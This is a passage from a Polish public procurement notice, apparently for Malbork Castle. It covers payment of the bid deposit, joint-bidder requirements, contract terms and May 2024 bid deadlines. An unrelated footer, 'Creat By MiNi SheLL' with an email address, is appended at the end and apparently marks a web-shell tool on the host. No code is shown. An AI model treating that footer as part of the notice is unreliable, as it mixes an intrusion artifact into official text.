Nr 05 1130 1121 0006 5623 8690 0001 <br/>Kod Swift (wymagany przy przelewach międzynarodowych): <br/>GOSKPLPW 05 1130 1121 0006 5623 8690 0001<br/>6.	Wnosząc wadium Wykonawca winien powołać się na nazwę niniejszego postępowania oraz numer nadany postępowaniu przez Zamawiającego.<br/>7.	Wadium w formie niepieniężnej: <br/>1)	Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej,<br/>2)	treść dokumentu wadium winien zawierać nazwę niniejszego postępowania oraz numer nadany postępowaniu przez Zamawiającego,<br/>3)	udzielona gwarancja lub poręczenie:<br/>a)	musi być gwarancją lub poręczeniem samoistnym, nieodwołalnym, bezwarunkowym i płatnym na pierwsze żądanie, bez konieczności przedkładania jakichkolwiek dodatkowych dokumentów,<br/>b)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie PZP,<br/>c)	z jej/jego treści powinno jednoznacznie wynikać zobowiązanie gwaranta/ poręczyciela do zapłaty Zamawiającemu całej kwoty wadium,<br/>d)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy PZP), Zamawiający wymaga, aby poręczenie lub gwarancja obejmowała swą treścią wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (tj. zobowiązanych z tytułu poręczenia lub gwarancji) lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum).<br/>8.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 ustawy PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Zgodnie z art. 58 ust. 1 ustawy PZP Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku zgodnie z art. 58 ust. 2 ustawy PZP Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich i zawarcia umowy w sprawie zamówienia publicznego.<br/>2) Oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.<br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego<br/>(w tym wspólnicy spółki cywilnej) do oferty dołącza/ją oświadczenie składane z art. 125 ust. 1 ustawy PZP tj. oświadczenie o niepodleganiu wykluczeniu - w zakresie wskazanym przez Zamawiającego – wzór oświadczenia stanowi załącznik nr 3 do SWZ.<br/>4) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 117 ust. 4 ustawy PZP dołączają do oferty oświadczenie z którego wynika, które usługi wykonają poszczególni Wykonawcy – wzór oświadczenia stanowi załącznik nr 5 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia opisany został w projekcie umowy, który stanowi załącznik nr 1 do SWZ (§ 9 projektu umowy). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zamek_malbork</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-20 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający dodatkowo wykluczy z udziału w postępowaniu Wykonawcę wobec którego zachodzi co najmniej jedna z przesłanek określonych w art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com